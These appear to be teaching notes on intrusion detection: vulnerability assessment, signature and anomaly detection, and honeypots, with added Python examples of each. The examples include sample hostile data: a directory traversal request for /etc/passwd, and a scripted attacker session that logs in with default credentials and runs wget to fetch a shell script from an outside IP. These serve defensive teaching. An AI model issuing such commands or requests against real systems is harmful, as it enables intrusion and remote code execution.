• Examples of threats that can be prevented by vulnerability assessment include:
1. SQL injection, XSS and other code injection attacks.
2. Escalation of privileges due to faulty authentication mechanisms.
3. Insecure defaults – software that ships with insecure settings, such as a guessable
admin passwords.
• There are several types of vulnerability assessments. These include:
1. Host assessment – The assessment of critical servers, which may be vulnerable
to attacks if not adequately tested or not generated from a tested machine image.
2. Network and wireless assessment – The assessment of policies and practices
to prevent unauthorized access to private or public networks and network-
accessible resources.
3. Database assessment – The assessment of databases or big data systems for
vulnerabilities and misconfigurations, identifying rogue databases or insecure
dev/test environments, and classifying sensitive data across an organization’s
infrastructure.
4. Application scans – The identifying of security vulnerabilities in web applications
and their source code by automated scans on the front-end or static/dynamic
analysis of source code.
4.3.4 Misuse or signature detection:
• Misuse detection, also called signature detection, is an approach in which attack
patterns or unauthorized and suspicious behaviors are learned based on past
activities and then the knowledge about the learned patterns is used to detect or
predict subsequent similar such patterns in a network.
• The attack or misuse patterns, also called signatures, include patterns in log files or
data packets that were found to be malicious and identified as threats to the network and
its hosts.
• A signature is a concrete pattern: a byte sequence, a string, or a particular combination
of field values. For intrusion detection systems protecting host computers, that is, for
host-based intrusion detection systems (HIDSs), the signature database may contain
various patterns of system calls, each representing a different attack on the host.
• In the case of a network-based intrusion detection system (NIDS), attack
signatures reveal specific patterns in data packets.
• These patterns may include signatures of the data payload, the packet header,
unauthorized activities, such as improper file transfer protocol (FTP) initiation, or
failed login attempt in Telnet.
• A typical data packet includes several fields such as: (i) the source IP address, (ii)
the destination IP address, (iii) the source port number for TCP or UDP, (iv) the
destination port number for TCP or UDP, (v) the protocol description such as UDP,
TCP or Internet control message protocol (ICMP), and (vi) the data payload. An
attack signature can be detected in any specific field, or in any combination of
these fields.
• Figure shows how a typical misuse or signature detection system works. These
detection systems execute algorithms that attempt to match learned patterns or
signatures from past attacks with the current activities in a network in order to
detect any possible attack or malicious activities.
• If the signature of any current activity in the network matches with the signature
of any activity in the attack signature database, the detection system raises an
alert. A module in the detection system initiates a further investigation of the
attack and starts invoking appropriate security modules to defend against such
attacks. If the attack is found to be a real attack and not a false alarm by the
detection system, the existing database of the attack signatures is updated with
the signature of the new attack.
• For example, if the signature of an attack is: login name = “Sidra,” then, whenever
there is any attempt to login into any device in the network with the name
“Sidra,” the signature detection system will raise an alert of an attack.
• Figure 1. Working of misuse or signature detection: Illustration of “if-else” rules.
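The field-plus-payload matching described above, including the page's own "login name = Sidra" signature, as an added example (my code, not from the notes): a minimal signature engine in which each signature constrains header fields and optionally a payload pattern, and every matching signature raises an alert. The packets and the other three signatures are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "tcp", "udp", "icmp"
    sport: int
    dport: int
    payload: bytes

@dataclass(frozen=True)
class Signature:
    sid: int
    msg: str
    proto: str = "any"
    port: Optional[int] = None          # service port, matched on either side of the packet
    content: Optional[bytes] = None     # regex applied to the payload; None = header-only rule

    def matches(self, p: Packet) -> bool:
        if self.proto != "any" and self.proto != p.proto:
            return False
        if self.port is not None and self.port not in (p.sport, p.dport):
            return False
        if self.content is not None and not re.search(self.content, p.payload):
            return False
        return True

SIGNATURES = [
    Signature(1000, "Telnet traffic (cleartext login, policy violation)", "tcp", 23),
    Signature(1001, "FTP login attempt with forbidden account name Sidra", "tcp", 21,
              rb"(?m)^USER[ \t]+Sidra[ \t]*\r?$"),
    Signature(1002, "Telnet failed login", "tcp", 23, rb"Login incorrect"),
    Signature(1003, "HTTP directory traversal attempt", "tcp", 80, rb"(\.\./){2,}"),
]

Alert = Tuple[int, str, str, str]   # (sid, msg, src, dst)

def inspect(packets: List[Packet], signatures: List[Signature] = SIGNATURES) -> List[Alert]:
    """The 'if-else' loop of the figure: every signature is tried against every
    packet and all matches are reported."""
    alerts: List[Alert] = []
    for p in packets:
        for s in signatures:
            if s.matches(p):
                alerts.append((s.sid, s.msg, p.src, p.dst))
    return alerts

# Constructed packets.
SAMPLE = [
    Packet("203.0.113.4", "10.0.0.5", "tcp", 51000, 21, b"USER Sidra\r\n"),
    Packet("203.0.113.4", "10.0.0.5", "tcp", 51000, 21, b"USER alice\r\n"),
    Packet("10.0.0.5", "203.0.113.4", "tcp", 23, 51001, b"\r\nLogin incorrect\r\nlogin: "),
    Packet("203.0.113.4", "10.0.0.5", "tcp", 51002, 80, b"GET /../../../../etc/passwd HTTP/1.1\r\n\r\n"),
    Packet("10.0.0.9", "10.0.0.2", "udp", 40000, 53, b"\x12\x34\x01\x00example"),
    Packet("203.0.113.4", "10.0.0.5", "tcp", 51000, 21, b"USER Sidrah\r\n"),   # anchored pattern: no match
]

if __name__ == "__main__":
    for sid, msg, src, dst in inspect(SAMPLE):
        print(f"[{sid}] {msg}: {src} -> {dst}")
```

Signature 1000 is header-only, signature 1001 anchors the name so "Sidrah" does not fire, and nothing here can see inside an encrypted session, which is the limitation noted for network-based IDS above.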
4.3.5 Anomaly Detection:
• When a novel attack is launched on a network, misuse detection systems cannot
detect the attack as the attack signature is not present in the existing database of
attack signatures.
• However, an anomaly detection system has the ability to detect new and unseen
attacks and raise an early alarm before any substantial damage to the network
could be done by the attack.
• Like the misuse detection approach, anomaly detection relies on a clear boundary between
normal and anomalous traffic: the profile of normal behaviour is assumed to differ
significantly from that of anomalous behaviour. The profile of normal events and normal
traffic should therefore be built from data that contains clearly defined normal behaviour
only.
• Figure shows the schematic diagram of a typical anomaly detection system.
Anomaly detection systems broadly work in the five steps:
(i) data collection,
(ii) data preprocessing,
(iii) normal behavior learning phase,
(iv) identification of misbehaviors using dissimilarity detection techniques and
(v) security responses.
• In a large-scale network, the data collection phase involves a large volume of data
to be collected from the network. In the data preprocessing phase, the volume of
data is reduced as this step includes feature selection, feature extraction, and
finally dimensionality reduction processes.
• Figure: Sequence of execution of modules in an anomaly detection system.
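The five steps above, as an added example (my code, not the notes'): a per-host, per-minute anomaly detector that collects constructed flow records, preprocesses them into two features, learns a mean-and-deviation profile from a normal training period, flags minutes whose z-score on any feature exceeds a threshold, and turns the alerts into a block list. The traffic, the two features and the threshold of 3 are assumptions; the zero-variance guard matters because a feature that never varies in training would otherwise divide by zero.

```python
import statistics
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class Record:            # step (i): one raw flow record from the collection phase
    minute: int
    host: str
    bytes_out: int
    dst_port: int

FEATURES = ("bytes_out", "distinct_ports")
Key = Tuple[str, int]                      # (host, minute)
Vector = Dict[str, float]

def preprocess(records: List[Record]) -> Dict[Key, Vector]:
    """Step (ii): aggregate raw records into a small per-host, per-minute feature vector
    (feature extraction and dimensionality reduction in one go)."""
    agg: Dict[Key, dict] = {}
    for r in records:
        e = agg.setdefault((r.host, r.minute), {"bytes_out": 0, "ports": set()})
        e["bytes_out"] += r.bytes_out
        e["ports"].add(r.dst_port)
    return {k: {"bytes_out": e["bytes_out"], "distinct_ports": len(e["ports"])} for k, e in agg.items()}

def learn_profile(vectors: Dict[Key, Vector]) -> Dict[str, Tuple[float, float]]:
    """Step (iii): mean and standard deviation of each feature over the normal period."""
    profile = {}
    for f in FEATURES:
        values = [v[f] for v in vectors.values()]
        profile[f] = (statistics.mean(values), statistics.pstdev(values) or 1.0)  # guard zero variance
    return profile

def detect(vectors: Dict[Key, Vector], profile, threshold: float = 3.0):
    """Step (iv): z-score each feature; any feature beyond the threshold makes the minute anomalous."""
    alerts = []
    for (host, minute), v in sorted(vectors.items()):
        zs = {f: (v[f] - profile[f][0]) / profile[f][1] for f in FEATURES}
        bad = {f: round(z, 1) for f, z in zs.items() if abs(z) > threshold}
        if bad:
            alerts.append((host, minute, bad))
    return alerts

def respond(alerts) -> List[str]:
    """Step (v): the security response; here, hosts to put on a block list."""
    return sorted({host for host, _, _ in alerts})

HOST = "10.0.0.9"   # assumed monitored host

def training_records() -> List[Record]:
    """Constructed normal traffic: web browsing with a little DNS, 60 minutes."""
    out = []
    for m in range(60):
        out.append(Record(m, HOST, 4000 + (m % 7) * 100, 443))
        out.append(Record(m, HOST, 1000, 80))
        if m % 3 == 0:
            out.append(Record(m, HOST, 200, 53))
    return out

def test_records() -> List[Record]:
    """Constructed later traffic: one normal minute, one large upload, one port scan."""
    out = [Record(100, HOST, 4300, 443), Record(100, HOST, 1000, 80)]
    out += [Record(101, HOST, 250000, 443), Record(101, HOST, 1000, 80)]   # volume anomaly
    out += [Record(102, HOST, 130, port) for port in range(1, 41)]         # many ports, normal volume
    return out

def run_demo():
    profile = learn_profile(preprocess(training_records()))
    alerts = detect(preprocess(test_records()), profile)
    return alerts, respond(alerts)

if __name__ == "__main__":
    alerts, blocklist = run_demo()
    for host, minute, bad in alerts:
        print(f"minute {minute} host {host}: anomalous {bad}")
    print("block:", blocklist)
```

Minute 102 is the point of having more than one feature: its byte count is unremarkable, so a volume-only profile would miss it, but the jump in distinct destination ports stands out. The usual caveat applies in the other direction too: if the training period already contained the scan, it would be learned as normal.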
4.3.6 Difference Between Misuse Detection and Anomaly Detection:
4.3.7 Honeypot:
• Honeypots are designed to purposely engage and deceive hackers and identify
malicious activities performed over the Internet.
• Honeypot is a network-attached system used as a trap for cyber-attackers to
detect and study the tricks and types of attacks used by hackers.
• A honeypot is designed to do the following:
1. Divert the attention of a potential attacker.
2. Collect information about the intruder's actions.
3. Encourage the attacker to stay for some time, allowing administrators to detect the
intrusion and act on it swiftly.
• Honeypots are designed with two important goals:
1. Make them look like real production systems.
2. Do not let legitimate users know about or access them, so that any traffic reaching a
honeypot is suspicious by definition.
Figure shows Honeypot deployed independently:
4.3.7.1 Types of Honeypot:
• Honeypots are classified based on their deployment and the involvement of the intruder.
• Based on their deployment, honeypots are divided into :
1. Research honeypots- These are used by researchers to analyze hacker attacks and
deploy different ways to prevent these attacks.
2. Production honeypots- Production honeypots are deployed in production networks
along with the server. These honeypots act as a frontend trap for the attackers,
consisting of false information and giving time to the administrators to improve any
vulnerability in the actual system.
• Based on interaction, honeypots are classified into:
1. Low interaction honeypots: low interaction honeypots give the attacker very little
insight into, and control over, the network.
• They simulate only the services that attackers most frequently request. The real operating
system is not exposed in a low interaction system, so it is less risky.
• They require very few resources and are easy to deploy.
• Their main disadvantage is that experienced attackers can easily identify these honeypots
and avoid them.
2. Medium interaction honeypots: medium interaction honeypots allow the attacker more
activity than low interaction honeypots.
• They expect certain activities and are designed to give responses beyond what a
low-interaction honeypot would give.
3. High interaction honeypots: a high interaction honeypot offers the attacker a large
number of services and activities, wasting the attacker's time while trying to gather
complete information about the attacker.
• These honeypots involve a real operating system and are therefore comparatively risky if
an attacker identifies the honeypot, or compromises it and uses it as a foothold.
• High interaction honeypots are also costly and complex to implement, but they provide
extensive information about attackers.
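A low-interaction honeypot as an added example (my code, not the notes'): it emulates only the telnet login dialogue and three shell commands with canned replies, never executes anything, accepts any password so the attacker keeps talking, and records every line. The host name, the canned output and the attacker session are constructed; because no legitimate user should ever connect, any session at all is reported as an alert.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

Event = Tuple[str, str]   # ("credential" | "command", detail)

@dataclass
class FakeTelnet:
    """Low-interaction emulation of a telnet service.  Only the login prompt
    and a few commands are simulated; nothing the attacker types is executed."""
    src: str
    state: str = "user"
    username: str = ""
    events: List[Event] = field(default_factory=list)

    BANNER = "fileserver01 login: "                      # constructed host name
    CANNED = {                                           # constructed replies
        "uname -a": "Linux fileserver01 3.10.0-1160 #1 SMP x86_64 GNU/Linux",
        "id": "uid=0(root) gid=0(root) groups=0(root)",
        "ls": "backup.tar.gz  customers.db  passwords.txt",
    }

    def handle(self, line: str) -> str:
        """Return what the honeypot sends back for one line of attacker input."""
        line = line.rstrip("\r\n")
        if self.state == "user":
            self.username, self.state = line, "pass"
            return "Password: "
        if self.state == "pass":
            self.events.append(("credential", f"{self.username}:{line}"))
            self.state = "shell"                           # every password "works"
            return "Last login: Tue Mar 12 08:14:02 from 10.0.0.4\n# "
        if self.state == "closed":
            return ""
        self.events.append(("command", line))
        if line in ("exit", "logout"):
            self.state = "closed"
            return "logout\n"
        return self.CANNED.get(line, f"-sh: {line}: command not found") + "\n# "

def run_session(src: str, lines: List[str]) -> FakeTelnet:
    pot = FakeTelnet(src)
    for line in lines:
        pot.handle(line)
    return pot

def summarize(pot: FakeTelnet) -> Tuple[str, str, int, int]:
    """Honeypot traffic has no legitimate source, so one session = one alert."""
    creds = sum(1 for kind, _ in pot.events if kind == "credential")
    cmds = sum(1 for kind, _ in pot.events if kind == "command")
    return ("honeypot interaction", pot.src, creds, cmds)

# Constructed attacker session.
ATTACKER_SESSION = ["admin\r\n", "admin123\r\n", "uname -a\r\n", "id\r\n",
                    "wget http://203.0.113.66/x.sh -O /tmp/x.sh\r\n", "exit\r\n"]

if __name__ == "__main__":
    pot = FakeTelnet("203.0.113.66")
    print(pot.BANNER, end="")
    for line in ATTACKER_SESSION:
        print(line.strip())
        print(pot.handle(line), end="")
    print(summarize(pot))
```

The "command not found" reply to the wget line is also where this design shows its limits: an experienced attacker notices that downloads never work and that the canned output never changes, which is the identifiability disadvantage listed above. A high interaction honeypot fixes that by running a real system, and inherits the containment risk that comes with it.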
4.3.7.2 Advantages of Honeypot:
1. Acts as a rich source of information and helps collect real-time data.
2. Identifies malicious activity even if encryption is used.
3. Wastes hackers’ time and resources.
4. Improves security.
4.3.7.3 Disadvantages of honeypot:
1. Being distinguishable from production systems, it can be easily identified by
experienced attackers.
2. Having a narrow field of view, it can only identify direct attacks.
3. A honeypot, once compromised, can be used to attack other systems.